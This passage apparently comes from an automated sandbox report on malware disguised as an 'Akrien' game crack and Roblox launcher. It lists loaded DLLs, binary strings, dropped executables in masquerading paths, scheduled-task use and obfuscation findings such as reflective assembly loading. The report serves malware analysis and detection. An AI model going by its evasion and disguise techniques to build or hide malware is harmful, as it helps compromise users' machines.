            Source: C:\Browserfont\refdhcp.exe Section loaded: amsi.dll
            Source: C:\Browserfont\refdhcp.exe Section loaded: userenv.dll
            Source: C:\Browserfont\refdhcp.exe Section loaded: propsys.dll
            Source: C:\Browserfont\refdhcp.exe Section loaded: dlnashext.dll
            Source: C:\Browserfont\refdhcp.exe Section loaded: wpdshext.dll
            Source: C:\Browserfont\refdhcp.exe Section loaded: edputil.dll
            Source: C:\Browserfont\refdhcp.exe Section loaded: urlmon.dll
            Source: C:\Browserfont\refdhcp.exe Section loaded: iertutil.dll
            Source: C:\Browserfont\refdhcp.exe Section loaded: srvcli.dll
            Source: C:\Browserfont\refdhcp.exe Section loaded: netutils.dll
            Source: C:\Browserfont\refdhcp.exe Section loaded: windows.staterepositoryps.dll
            Source: C:\Browserfont\refdhcp.exe Section loaded: wintypes.dll
            Source: C:\Browserfont\refdhcp.exe Section loaded: appresolver.dll
            Source: C:\Browserfont\refdhcp.exe Section loaded: bcp47langs.dll
            Source: C:\Browserfont\refdhcp.exe Section loaded: slc.dll
            Source: C:\Browserfont\refdhcp.exe Section loaded: sppc.dll
            Source: C:\Browserfont\refdhcp.exe Section loaded: onecorecommonproxystub.dll
            Source: C:\Browserfont\refdhcp.exe Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
            Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
            Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: mscoree.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: apphelp.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: version.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: wldp.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: profapi.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: sspicli.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: rasapi32.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: rasman.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: rtutils.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: winhttp.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: dhcpcsvc6.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: dhcpcsvc.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: winnsi.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: wbemcomn.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: amsi.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: userenv.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: winmm.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: winmmbase.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: mmdevapi.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: devobj.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: ksuser.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: avrt.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: audioses.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: powrprof.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: umpdc.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: msacm32.dll
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Section loaded: midimap.dll
            Source: C:\Users\user\Desktop\RFAwChXSve.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: RFAwChXSve.exe Static file information: File size 13752832 > 1048576
            Source: RFAwChXSve.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0xd1bc00
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: AkrienPremiumCrackByHurminka.exe, 00000002.00000003.1761671972.0000000003891000.00000004.00000020.00020000.00000000.sdmp, AkrienCrack.exe, 00000005.00000003.1766614314.0000000004B76000.00000004.00000020.00020000.00000000.sdmp, AkrienCrack.exe, 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp, AkrienCrack.exe, 00000005.00000003.1765791785.0000000006241000.00000004.00000020.00020000.00000000.sdmp, AkrienCrack.exe, 00000005.00000000.1762362221.0000000000B73000.00000002.00000001.01000000.0000000B.sdmp, AkrienCrack.exe.2.dr
            Source: Binary string: C:\buildAgent\work\ci_deploy_nbsninja_boot-x86_git\build.ninja\common\vs2019\x86\release\Installer\BootstrapperClient\BootstrapperClient.pdb source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.dr
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.dr
            Source: Binary string: serialNumbersignatureissuervaliditysubjectissuerUIDsubjectUIDextensionsX509_CINFcert_infosig_algX509CERTIFICATEcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.dr
            Source: Binary string: .pdb /MT source: RFAwChXSve.exe, 00000000.00000003.1727884209.0000000003329000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, vKVTrVC9rFRJDAycoWs.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, vKVTrVC9rFRJDAycoWs.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, vKVTrVC9rFRJDAycoWs.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, TwdfpBTRnVmp5R65UE5.cs .Net Code: AqnmwMo5Jf System.AppDomain.Load(byte[])
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, TwdfpBTRnVmp5R65UE5.cs .Net Code: AqnmwMo5Jf System.Reflection.Assembly.Load(byte[])
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, TwdfpBTRnVmp5R65UE5.cs .Net Code: AqnmwMo5Jf
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, TwdfpBTRnVmp5R65UE5.cs .Net Code: AqnmwMo5Jf System.AppDomain.Load(byte[])
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, TwdfpBTRnVmp5R65UE5.cs .Net Code: AqnmwMo5Jf System.Reflection.Assembly.Load(byte[])
            Source: 5.3.AkrienCrack.exe.628e50d.0.raw.unpack, TwdfpBTRnVmp5R65UE5.cs .Net Code: AqnmwMo5Jf
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, TwdfpBTRnVmp5R65UE5.cs .Net Code: AqnmwMo5Jf System.AppDomain.Load(byte[])
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, TwdfpBTRnVmp5R65UE5.cs .Net Code: AqnmwMo5Jf System.Reflection.Assembly.Load(byte[])
            Source: 5.3.AkrienCrack.exe.4bc350d.1.raw.unpack, TwdfpBTRnVmp5R65UE5.cs .Net Code: AqnmwMo5Jf
            Source: RobloxPlayerLauncher.exe.0.dr Static PE information: 0xF4DCA022 [Sun Mar 7 10:46:58 2100 UTC]
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe Code function: 3_2_008A9D50 LoadLibraryW,GetProcAddress,3_2_008A9D50
            Source: initial sample Static PE information: section where entry point is pointing to: .akr1
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exe File created: C:\Browserfont\__tmp_rar_sfx_access_check_4374828
            Source: RobloxPlayerLauncher.exe.0.dr Static PE information: section name: CPADinfo
            Source: RobloxPlayerLauncher[1].exe.1.dr Static PE information: section name: CPADinfo
            Source: RobloxPlayerLauncher.exe.1.dr Static PE information: section name: CPADinfo
            Source: AkrienPremiumCrack.exe.2.dr Static PE information: section name: _RDATA
            Source: AkrienPremiumCrack.exe.2.dr Static PE information: section name: .akr0
            Source: AkrienPremiumCrack.exe.2.dr Static PE information: section name: .akr1
            Source: AkrienCrack.exe.2.dr Static PE information: section name: .didat
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe Code function: 1_2_00A2B5D6 push ecx; ret 1_2_00A2B5E9
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe Code function: 3_2_00A2B5D6 push ecx; ret 3_2_00A2B5E9
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exe Code function: 5_2_00B5E28C push eax; ret 5_2_00B5E2AA
            Source: C:\Users\user\AppData\Local\Temp\AkrienCrack.exe Code function: 5_2_00B5ED46 push ecx; ret 5_2_00B5ED59
            Source: C:\Browserfont\refdhcp.exe Code function: 9_2_00007FFD9B9F7430 pushfd ; iretd 9_2_00007FFD9B9F7433
            Source: C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe Code function: 38_2_00007FFD9BA07430 pushfd ; iretd 38_2_00007FFD9BA07433
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, O2YtyfIDiYTK070fC05.cs High entropy of concatenated method names: 'pWhTQsRjgk', 'T09T4IX7Zo', 'abLTvRXmfm', 'ryitSeyb4hfqGxDAJEw', 'A1yyeUyvs0tfBlpiuH6', 'x6XDGWycDTQeKnqBykA', 'olIhD9yyAtieoXlLS4X', 'xaAPLYyVAeyRJGMLkUC', 'MZuadByjEj4wPxEFDsk', 'Ut0WRfygYuq7CVQC5Bd'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, yreLk8LxTmerL9n4Vc6.csHigh entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, jqTpyseiqpAIuD3HEEI.csHigh entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, GH9f9xgQcnDETOPx5N.csHigh entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'ab41FcBnX5VtJF69fnP', 'O0UpwkBAn42lFOnIkJo', 'bcu2TtBQKC292AZivmL', 'hdilcEBfNcIK2ZGNIoL', 'l2kbZfBOgqKTZIuWv7m', 'QUdsFKBZjwp03UHkpeB'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, TlUOfImhs5BD8vYScS4.csHigh entropy of concatenated method names: 'jmnlU5SaPW', 'TOclN1VwLj', 'V2YlS5bs25', 'qrhA956g0xIbTSCdPSG', 'Xry6b26Veev8JQ8dO4G', 'TJeRfJ6jJm3GyhY4XWh', 'iu683M6RcGyD1lGpK4H', 'nsdlWpKyiI', 'zZIlB2RofT', 'Slrl2lC3ig'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, ne6EjaLkbnELWkAVVZs.csHigh entropy of concatenated method names: 'OygWcjUMHY', 'EW6Wi35LJt', 'tHTW9ad87Z', 'AZJWwaiKHY', 'OYoWWZE12J', 'ulIWBy9i5j', 'WRmW2GtG2c', 'zo3WtN4qxI', 'eBIWJANhKl', 'nlJWHJtZsE'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, id8ZLJm1lbi8yHjBtkP.csHigh entropy of concatenated method names: 'sg9', 'qnyjUX0fHJ', 'SYxRjIEW2A', 'MQAjBADwgr', 'tR6vnnDOlM1kVItul1F', 'Oc6LCkDZI6mVGUBClYh', 'o2wXO8DmDrDcfYqfFMB', 'fcb3k2DQFGo9jkRBFiC', 'wOEo4TDf4ZfuEmPve6U', 'DKpuflDoAxl4AKUKdww'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, VI2gpKee3fYyA0EcDfh.csHigh entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, KMsi7FeMaxHccyd4OLf.csHigh entropy of concatenated method names: 'PJ1', 'jo3', 'XReXRhxmtX', 'RdxXh7b1ys', 'eO9XxnE4Ex', 'EC9', '_74a', '_8pl', '_27D', '_524'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, vKVTrVC9rFRJDAycoWs.csHigh entropy of concatenated method names: 'lyjql0QrfdL1hkn4IP6', 'QJZua1QxP1XkwoMOhAk', 'FjRastQ11MdHJNwxMcq', 'qkjiCfQH5WPfndik99L', 'VThpwX45B7', 'B84LelQLHMa4xnLKKA4', 'cG2bRnQ4HRArhOvooFM', 'Dk1aJVQSM5vSAPUwE3Q', 'xYSSwaQ51CIv8iX1apb', 'lgC3UQQaW535RqdbHSh'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, qOqfHwmoGFWsdpKyiIG.csHigh entropy of concatenated method names: '_269', '_5E7', 'SPVjV513kC', 'Mz8', 'Xh1jvRee8r', 'yY9QAB8oZiZjC25SVht', 'zxF8GZ8MKAvNC1v74TG', 'U3Q4CV8Njdka7LEDbyB', 'mHow348qf3Je8cKsfds', 'Ra7sKu8hHOudnPRi8aB'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, M4R0dhmkIrbj0P0jplW.csHigh entropy of concatenated method names: 'Y10qDv1UxtgC4nMAmLV', 'DUPBh01GBbiQQNgArXF', 'GwVN6a1K9yy55XTb3gK', 'pBqwgZ1iOmc37eZuh98', 'IWF', 'j72', 'Cqfh2XFAJ6', 'L08htwRLl7', 'j4z', 'CvKhJO6J1D'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, HbFiVLCcvWLYglkTtE8.csHigh entropy of concatenated method names: 'lIZpvfQwlp', 'Aa6pcomyZr', 'h7Sp5uEBMG', 'nGypiHVG4p', 'YxTpGgFV3H', 'xbOpYwOlRq', 'kCspXQBvNk', 'O45pnMl3OK', 'zqZppqrU6s', 'yAEpE1RRvI'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, SEHOAvdOU1Khvs1klch.csHigh entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, GQ9Ue3mBqMkdSQJuRBW.csHigh entropy of concatenated method names: 'D04ly4vpNs', 'cJ7lZllskk', 'JK5l7reLk8', 'XnOpsS6QQOZFKoPcUkZ', 'R2LENt6fELg9fMoR9ps', 'UHCnwY6OH9UE4MD8iun', 'gV6vhg6Zx0hC5NDxl8R', 'IcoCTk6mwITptqojWui', 'ELIqng6oxpArsINauo2', 'VKyoUI6M3vPuyY1Hetf'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, bfT69bmgjSH0amKEjrJ.csHigh entropy of concatenated method names: 'oYo', '_1Z5', 'p0pjS5wwOI', 'WmRhLQDfAb', 'WGOjDX4cPI', 'jawPHT8jY6q0LtXmsf5', 'awiPHm8g6TrQEiVpiKr', 'bPQuPX8RtdLRcCVVPaP', 'ltqHuD8eP38qkxq4pfZ', 'MwdWa780I1jhrqxlC64'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, TlbBVQSFLtH5rbgfHS.csHigh entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'jvYAZFJXACPtwxh8g42', 'n38YasJEpOYStjFXloo', 'mDMWLkJzU72E3titY11', 'rXHJ35dY5NlZc69OLri', 'fF0avld38pKHkrXDXwO', 'SnxoXbdJ5pJEZO2xQvB'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, HgYfyZIk2SRCsmW2ZwY.csHigh entropy of concatenated method names: 'mT6THIFWnm', 'f469NGy7ofGNIKyE1Cv', 'SFI1NfyWKOJ8Mep5NXX', 'gXwX5ayB1FjBBY7hDON', 'Bs5J5yylHBRkXyA2hhL', 'H3UEiqyFCFZ4tCD6PSv', '_5q7', 'YZ8', '_6kf', 'G9C'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, FLa5R7Cqn0wTkoKVhS.csHigh entropy of concatenated method names: 'k5R97qn0w', 'ScWj1q5qo8t5iZvSIG', 'YbViLZ4peSO8XjJjAt', 'lsGoCrSoP2kpusJvav', 'SrcTnAanciZhxxEYei', 'qGMt5XKtjGR9xf1d9k', 'pjVTPaums', 'PfUms1T85', 'A1iL77PnZ', 'cyAdNTnwr'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, C6MOHv7t281xyXllbC.csHigh entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'GuXGEBlR7UyOeU52wsL', 'lLBTeAleQNXFrNgcYF0', 'tpY0Inl0dtsbjjyteqa', 'xMTNp1lsJjWITx43jeB', 'fpB3GclPm8isDKn2nmT', 'EO0vRAlpVaR0FXhP6Y2'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, D7QSuBL29w3nS6Vw29i.csHigh entropy of concatenated method names: 'UXVuL7NuJJ', 'kSmud8P71y', 'pD0ue2u3sT', 'QY0GZWr0CEurhHFm4QA', 'd61EITrsfFDAPnbWQ5x', 'p9Er23rRXZgPKwToUCo', 'wwkAGXredqTh0Qju2nZ', 'kKaaGGrPgimsOZmuwpZ', 'cCkXHGrpfOXOkKAe65A', 'as4VKerIWxfuVyaKmXu'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, Qr2PMBec4MIXKxZlNRg.csHigh entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, vsxgtqLvg6YNZfPEUmJ.csHigh entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'LG09AFFsAv', '_3il', 'oDn9I7fWWU', 'MeK9T1iZdE', '_78N', 'z3K'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, u7HZG9TwYDjcl42lBdB.csHigh entropy of concatenated method names: 'dZymkwlb79', 'ox6EeRgdbBwfrl3Vvjw', 'EfE6e0gBwUjTKH1uE9x', 'O4AUcbg3XXtVRuA2md1', 'oGJD07gJbG2U9XoNhed', 'wVXfe3glrVJySqNVaoq', 'iOUV37g7gb73JpXEBnw', 'qNKEyCgWZS2FTQuohqU', 'pNDDAegFI5VhXN4bxQ7', 'vtetUHgvsrQqRx9VLp3'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, aVQNZKIxZnDqXqRhLco.csHigh entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'z14ZxnWpfuoOohOaIiN', 'xPiLr2WIvGDmVrgkabq', 'gSfia4W6QXjgUpQ6SU8', 'xkU90bWwMJVlovQp4DE', 'BJZJKiWDkZuJHyDOQDw', 'a5bAFIW8Z0eiRMCKa7U'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, PIqp0udDQIruKYuA5Yw.csHigh entropy of concatenated method names: 'xIscGdpk7k', 'nnBcY1AKSq', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'ppacX3dDcO', '_5f9', 'A6Y'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, GWixqpzShZ1Fhf7o7y.csHigh entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'Va5cu07d1mVSStlIL2g', 'mwEJ9G7BVXXKD3LH3Of', 'XaJ0co7l2caNY4uR6MT', 'Q56iIM77i9dOQjg0Jn6', 'LtWQyO7WlybS7pMISp2', 'S4DMyX7FNyjVuQVP1Bw'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, hNpSlbov5mWDdLF0Nx.csHigh entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'MvsAV2lk3HMDR9se76R', 'YYM1CDl9ppeFQOWJxKZ', 'lWtCr6lLQAJF9doUw5h', 'tEWdTel4RZUf1ef5UMS', 'Sov3FslS9EIP1BLFrK2', 'hOfrOhl5WrWUDLtKQNp'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, elgOrYItBBHTlBqTsjC.csHigh entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 'yJ8588FYinQu5Tly2eW', 'ULI5KGF32hr1eEojrmj', 'S3IIJlFJVx2KZFeRMRM', 'JUH909FdxOkCWu7AlRY', 'gqjrDCFBEYCsXsO9OCA', 'VPIvSQFlGw6o5nwGnYi'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, JWnmvCICkCmrI8IOSHw.csHigh entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'xpZgyA7qam5sRXwyXxN', 'FH6thj7hNGE8X1WmneV', 'YBYEbB72e73Q1RgOl0O', 'KpXxx17X66n9IjkGfKc', 'sRyUN77EMXEKi0i1Ijx', 'VsD6vr7zCyjdXMmZrgk'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, Mi4kKBIdKxdoEFibR7q.csHigh entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'dfv8997QSi0SP1lelde', 'cCbdOq7fJMe5w3lEDAN', 'vovvxF7OfZisqM9OJkm', 'vY2cyM7Zjbnr8S5dyjR', 'qWmIKv7mOfbjY6Hfhc3', 'afYnQg7oVs5OlVyBZKU'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, y0iWHjLJNc6MLpg9fk3.csHigh entropy of concatenated method names: '_7zt', 'FtjuHG6EWP', 'lYbuVwp14H', 'e5rubsN3VK', 'hXAuseBpbg', 'bYcuQMHKZv', 'PU7u4UYCSQ', 'sNTDlcrDyxm0Kq4PBWq', 'EMno0Dr8ggd0WcfbhSr', 'L07L7jr6FFFDvu4OxnH'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, dhEdhDTJA9Dgn1RgpST.csHigh entropy of concatenated method names: 'F4RmzseGbG', 'rFnLAukJHM', 'qHPLIPm1u6', 'QgrLTP4QIK', 'lVNLmT360g', 'BfyLLZ2SRC', 'umWLd2ZwYi', 'M1NLeYyTLu', 'sRdLCTXqwF', 'JSuLlxLX63'
            Source: 2.3.AkrienPremiumCrackByHurminka.exe.38de514.0.raw.unpack, NexEDCTN8M6rdW2LXJe.csHigh entropy of concatenated method names: 'hMedXxEDC8', 'pQx02J0X58xGdI1hsOP', 'HEhRo00E3eqnaIQHQaG', 'isbhBl0hhU8B6kTdTyF', 'i4wbTv02gYi6MjJNJll', 'pp1Zmt0zrvTqwQ9XWuI', 'mOZ0GisYvP4UHE5fVV8', 'O3LZb0s3Vq95vtJBKTu', 'DkC9VHsJXqH7hAbmJ4d', 'vEahKbsdMfnfpheVj5v'
